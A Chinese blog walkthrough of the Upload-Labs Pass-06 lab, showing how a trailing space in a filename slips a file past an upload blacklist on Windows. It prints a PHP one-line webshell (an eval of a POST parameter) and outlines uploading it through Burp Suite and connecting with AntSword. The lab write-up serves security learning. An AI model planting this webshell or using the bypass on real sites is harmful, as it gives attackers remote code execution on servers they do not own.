0
点赞
收藏
分享

微信扫一扫

Upload-Labs-Pass-06

西风白羽 2022-04-21 阅读 72
web安全网络安全

一、相关知识

1、空格绕过原理:

        Windows系统下,对于文件名中的空格作为空处理,程序中的检测代码却不能自动删除空格,从而绕过黑名单。针对此情况,应修改对应的文件名,添加空格。

二、环境搭配

攻击机:kaliIP:192.168.0.112
靶机:Windows2008IP:192.168.0.130:9006

三、文件上传

1、制作一句话木马

命令:<?php @eval($_POST['hacker']); ?>

 

 2、设置代理

浏览器设置代理

 Burpsuite设置代理

 3、文件上传

在文件名后面添加空格 

  右键点击图片使用新标签打开图片,可以发现图片上传的路径。

四、蚁剑连接

 

 

举报

相关推荐

Upload-Labs-Pass-03

网络安全web安全

upload-labs靶场Pass-03

aws云计算

文件上传漏洞靶场upload-labs学习(pass11-pass15)

学习php安全

文件上传漏洞靶场upload-labs学习(pass16-pass21)

web安全网络安全php

upload-labs_pass19_条件竞争+apache解析漏洞

apache解析漏洞条件竞争文件上传漏洞网络安全upload-labs

文件上传漏洞--Upload-labs--Pass01--前端绕过

web安全文件上传漏洞

upload-labs靶场-Pass-09关-思路以及过程

phpapacheupload-labs靶场upload-labs靶场过关渗透测试

upload-labs靶场-Pass-12关-思路以及过程

php网络安全upload-labs靶场upload-labs靶场通关渗透测试

upload-labs

前端

upload-labs/Pass-07 未知后缀名解析漏洞复现

phpwindows
0 条评论